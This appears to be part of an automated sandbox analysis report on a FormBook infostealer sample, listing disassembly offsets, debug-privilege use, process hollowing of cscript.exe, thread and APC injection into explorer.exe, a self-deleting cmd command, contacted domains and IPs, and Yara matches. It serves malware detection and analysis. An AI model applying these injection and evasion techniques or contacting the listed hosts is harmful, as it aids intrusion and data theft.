Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0478B02A mov eax, dword ptr fs:[00000030h] 9_2_0478B02A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047ABC2C mov eax, dword ptr fs:[00000030h] 9_2_047ABC2C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047F7016 mov eax, dword ptr fs:[00000030h] 9_2_047F7016
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047F7016 mov eax, dword ptr fs:[00000030h] 9_2_047F7016
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047F7016 mov eax, dword ptr fs:[00000030h] 9_2_047F7016
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047F6C0A mov eax, dword ptr fs:[00000030h] 9_2_047F6C0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047F6C0A mov eax, dword ptr fs:[00000030h] 9_2_047F6C0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047F6C0A mov eax, dword ptr fs:[00000030h] 9_2_047F6C0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047F6C0A mov eax, dword ptr fs:[00000030h] 9_2_047F6C0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_048314FB mov eax, dword ptr fs:[00000030h] 9_2_048314FB
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h] 9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h] 9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h] 9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h] 9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h] 9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h] 9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h] 9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h] 9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h] 9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h] 9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h] 9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h] 9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h] 9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h] 9_2_04831C06
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0484740D mov eax, dword ptr fs:[00000030h] 9_2_0484740D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0484740D mov eax, dword ptr fs:[00000030h] 9_2_0484740D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0484740D mov eax, dword ptr fs:[00000030h] 9_2_0484740D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047F6CF0 mov eax, dword ptr fs:[00000030h] 9_2_047F6CF0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047F6CF0 mov eax, dword ptr fs:[00000030h] 9_2_047F6CF0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047F6CF0 mov eax, dword ptr fs:[00000030h] 9_2_047F6CF0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04844015 mov eax, dword ptr fs:[00000030h] 9_2_04844015
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04844015 mov eax, dword ptr fs:[00000030h] 9_2_04844015
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047AF0BF mov ecx, dword ptr fs:[00000030h] 9_2_047AF0BF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047AF0BF mov eax, dword ptr fs:[00000030h] 9_2_047AF0BF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047AF0BF mov eax, dword ptr fs:[00000030h] 9_2_047AF0BF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0480C450 mov eax, dword ptr fs:[00000030h] 9_2_0480C450
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0480C450 mov eax, dword ptr fs:[00000030h] 9_2_0480C450
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B90AF mov eax, dword ptr fs:[00000030h] 9_2_047B90AF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04832073 mov eax, dword ptr fs:[00000030h] 9_2_04832073
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04841074 mov eax, dword ptr fs:[00000030h] 9_2_04841074
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04779080 mov eax, dword ptr fs:[00000030h] 9_2_04779080
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047F3884 mov eax, dword ptr fs:[00000030h] 9_2_047F3884
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047F3884 mov eax, dword ptr fs:[00000030h] 9_2_047F3884
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0477B171 mov eax, dword ptr fs:[00000030h] 9_2_0477B171
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0477B171 mov eax, dword ptr fs:[00000030h] 9_2_0477B171
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0479C577 mov eax, dword ptr fs:[00000030h] 9_2_0479C577
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0479C577 mov eax, dword ptr fs:[00000030h] 9_2_0479C577
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0477C962 mov eax, dword ptr fs:[00000030h] 9_2_0477C962
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04797D50 mov eax, dword ptr fs:[00000030h] 9_2_04797D50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B3D43 mov eax, dword ptr fs:[00000030h] 9_2_047B3D43
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0479B944 mov eax, dword ptr fs:[00000030h] 9_2_0479B944
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0479B944 mov eax, dword ptr fs:[00000030h] 9_2_0479B944
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047F3540 mov eax, dword ptr fs:[00000030h] 9_2_047F3540
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047A513A mov eax, dword ptr fs:[00000030h] 9_2_047A513A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047A513A mov eax, dword ptr fs:[00000030h] 9_2_047A513A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047A4D3B mov eax, dword ptr fs:[00000030h] 9_2_047A4D3B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047A4D3B mov eax, dword ptr fs:[00000030h] 9_2_047A4D3B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047A4D3B mov eax, dword ptr fs:[00000030h] 9_2_047A4D3B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0477AD30 mov eax, dword ptr fs:[00000030h] 9_2_0477AD30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047FA537 mov eax, dword ptr fs:[00000030h] 9_2_047FA537
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h] 9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h] 9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h] 9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h] 9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h] 9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h] 9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h] 9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h] 9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h] 9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h] 9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h] 9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h] 9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h] 9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04794120 mov eax, dword ptr fs:[00000030h] 9_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04794120 mov eax, dword ptr fs:[00000030h] 9_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04794120 mov eax, dword ptr fs:[00000030h] 9_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04794120 mov eax, dword ptr fs:[00000030h] 9_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04794120 mov ecx, dword ptr fs:[00000030h] 9_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_048041E8 mov eax, dword ptr fs:[00000030h] 9_2_048041E8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04828DF1 mov eax, dword ptr fs:[00000030h] 9_2_04828DF1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04779100 mov eax, dword ptr fs:[00000030h] 9_2_04779100
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04779100 mov eax, dword ptr fs:[00000030h] 9_2_04779100
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04779100 mov eax, dword ptr fs:[00000030h] 9_2_04779100
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0477B1E1 mov eax, dword ptr fs:[00000030h] 9_2_0477B1E1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0477B1E1 mov eax, dword ptr fs:[00000030h] 9_2_0477B1E1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0477B1E1 mov eax, dword ptr fs:[00000030h] 9_2_0477B1E1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0478D5E0 mov eax, dword ptr fs:[00000030h] 9_2_0478D5E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0478D5E0 mov eax, dword ptr fs:[00000030h] 9_2_0478D5E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04848D34 mov eax, dword ptr fs:[00000030h] 9_2_04848D34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047A35A1 mov eax, dword ptr fs:[00000030h] 9_2_047A35A1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047AFD9B mov eax, dword ptr fs:[00000030h] 9_2_047AFD9B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047AFD9B mov eax, dword ptr fs:[00000030h] 9_2_047AFD9B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0479C182 mov eax, dword ptr fs:[00000030h] 9_2_0479C182
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h] 9_2_04772D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h] 9_2_04772D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h] 9_2_04772D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h] 9_2_04772D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h] 9_2_04772D8A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047AA185 mov eax, dword ptr fs:[00000030h] 9_2_047AA185
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B927A mov eax, dword ptr fs:[00000030h] 9_2_047B927A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0480FE87 mov eax, dword ptr fs:[00000030h] 9_2_0480FE87
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h] 9_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h] 9_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h] 9_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h] 9_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h] 9_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0478766D mov eax, dword ptr fs:[00000030h] 9_2_0478766D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04840EA5 mov eax, dword ptr fs:[00000030h] 9_2_04840EA5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04840EA5 mov eax, dword ptr fs:[00000030h] 9_2_04840EA5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04840EA5 mov eax, dword ptr fs:[00000030h] 9_2_04840EA5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04779240 mov eax, dword ptr fs:[00000030h] 9_2_04779240
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04779240 mov eax, dword ptr fs:[00000030h] 9_2_04779240
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04779240 mov eax, dword ptr fs:[00000030h] 9_2_04779240
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04779240 mov eax, dword ptr fs:[00000030h] 9_2_04779240
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h] 9_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h] 9_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h] 9_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h] 9_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h] 9_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h] 9_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0482FEC0 mov eax, dword ptr fs:[00000030h] 9_2_0482FEC0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04848ED6 mov eax, dword ptr fs:[00000030h] 9_2_04848ED6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0477E620 mov eax, dword ptr fs:[00000030h] 9_2_0477E620
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04793A1C mov eax, dword ptr fs:[00000030h] 9_2_04793A1C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0477C600 mov eax, dword ptr fs:[00000030h] 9_2_0477C600
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0477C600 mov eax, dword ptr fs:[00000030h] 9_2_0477C600
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0477C600 mov eax, dword ptr fs:[00000030h] 9_2_0477C600
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047A16E0 mov ecx, dword ptr fs:[00000030h] 9_2_047A16E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047876E2 mov eax, dword ptr fs:[00000030h] 9_2_047876E2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047A36CC mov eax, dword ptr fs:[00000030h] 9_2_047A36CC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B8EC7 mov eax, dword ptr fs:[00000030h] 9_2_047B8EC7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0482FE3F mov eax, dword ptr fs:[00000030h] 9_2_0482FE3F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0478AAB0 mov eax, dword ptr fs:[00000030h] 9_2_0478AAB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0478AAB0 mov eax, dword ptr fs:[00000030h] 9_2_0478AAB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047AFAB0 mov eax, dword ptr fs:[00000030h] 9_2_047AFAB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h] 9_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h] 9_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h] 9_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h] 9_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h] 9_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04804257 mov eax, dword ptr fs:[00000030h] 9_2_04804257
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047F46A7 mov eax, dword ptr fs:[00000030h] 9_2_047F46A7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0482B260 mov eax, dword ptr fs:[00000030h] 9_2_0482B260
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0482B260 mov eax, dword ptr fs:[00000030h] 9_2_0482B260
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04848A62 mov eax, dword ptr fs:[00000030h] 9_2_04848A62
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047AD294 mov eax, dword ptr fs:[00000030h] 9_2_047AD294
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047AD294 mov eax, dword ptr fs:[00000030h] 9_2_047AD294
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047A3B7A mov eax, dword ptr fs:[00000030h] 9_2_047A3B7A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047A3B7A mov eax, dword ptr fs:[00000030h] 9_2_047A3B7A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0482D380 mov ecx, dword ptr fs:[00000030h] 9_2_0482D380
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0483138A mov eax, dword ptr fs:[00000030h] 9_2_0483138A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0477DB60 mov ecx, dword ptr fs:[00000030h] 9_2_0477DB60
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0478FF60 mov eax, dword ptr fs:[00000030h] 9_2_0478FF60
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04845BA5 mov eax, dword ptr fs:[00000030h] 9_2_04845BA5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0477F358 mov eax, dword ptr fs:[00000030h] 9_2_0477F358
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0477DB40 mov eax, dword ptr fs:[00000030h] 9_2_0477DB40
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0478EF40 mov eax, dword ptr fs:[00000030h] 9_2_0478EF40
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047AE730 mov eax, dword ptr fs:[00000030h] 9_2_047AE730
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04774F2E mov eax, dword ptr fs:[00000030h] 9_2_04774F2E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04774F2E mov eax, dword ptr fs:[00000030h] 9_2_04774F2E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0484070D mov eax, dword ptr fs:[00000030h] 9_2_0484070D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0484070D mov eax, dword ptr fs:[00000030h] 9_2_0484070D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047B37F5 mov eax, dword ptr fs:[00000030h] 9_2_047B37F5
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0480FF10 mov eax, dword ptr fs:[00000030h] 9_2_0480FF10
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0480FF10 mov eax, dword ptr fs:[00000030h] 9_2_0480FF10
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_0483131B mov eax, dword ptr fs:[00000030h] 9_2_0483131B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04848B58 mov eax, dword ptr fs:[00000030h] 9_2_04848B58
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047AB390 mov eax, dword ptr fs:[00000030h] 9_2_047AB390
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047F7794 mov eax, dword ptr fs:[00000030h] 9_2_047F7794
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047F7794 mov eax, dword ptr fs:[00000030h] 9_2_047F7794
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_047F7794 mov eax, dword ptr fs:[00000030h] 9_2_047F7794
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04848F6A mov eax, dword ptr fs:[00000030h] 9_2_04848F6A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04781B8F mov eax, dword ptr fs:[00000030h] 9_2_04781B8F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 9_2_04781B8F mov eax, dword ptr fs:[00000030h] 9_2_04781B8F
Enables debug privileges
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 172.67.129.33 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.21.40.211 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.manageoceanaccount.com
Source: C:\Windows\explorer.exe Domain query: www.cwdelrio.com
Source: C:\Windows\explorer.exe Network Connect: 89.46.109.25 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.241.62.54 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.melodezu.com
Source: C:\Windows\explorer.exe Network Connect: 64.227.87.162 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.sprinkleresources.com
Source: C:\Windows\explorer.exe Domain query: www.professioneconsulenza.net
Source: C:\Windows\explorer.exe Domain query: www.fitnesstwentytwenty.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.mydreamtv.net
Source: C:\Windows\explorer.exe Domain query: www.jorgeporcayo.com
Source: C:\Windows\explorer.exe Network Connect: 78.47.57.7 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.21.86.209 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.saludflv.info
Source: C:\Windows\explorer.exe Domain query: www.iwccgroup.com
Source: C:\Windows\explorer.exe Domain query: www.builtbydawn.com
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Section loaded: unknown target: C:\Users\user\Desktop\85vLO1Rpcy.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Thread register set: target process: 3424 Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Thread register set: target process: 3424 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 310000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe Process created: C:\Users\user\Desktop\85vLO1Rpcy.exe 'C:\Users\user\Desktop\85vLO1Rpcy.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\85vLO1Rpcy.exe' Jump to behavior
Source: explorer.exe, 00000005.00000000.665818761.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.694406100.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000009.00000002.917555422.0000000003000000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.694406100.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000009.00000002.917555422.0000000003000000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.694406100.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000009.00000002.917555422.0000000003000000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.694406100.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000009.00000002.917555422.0000000003000000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.684746061.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE
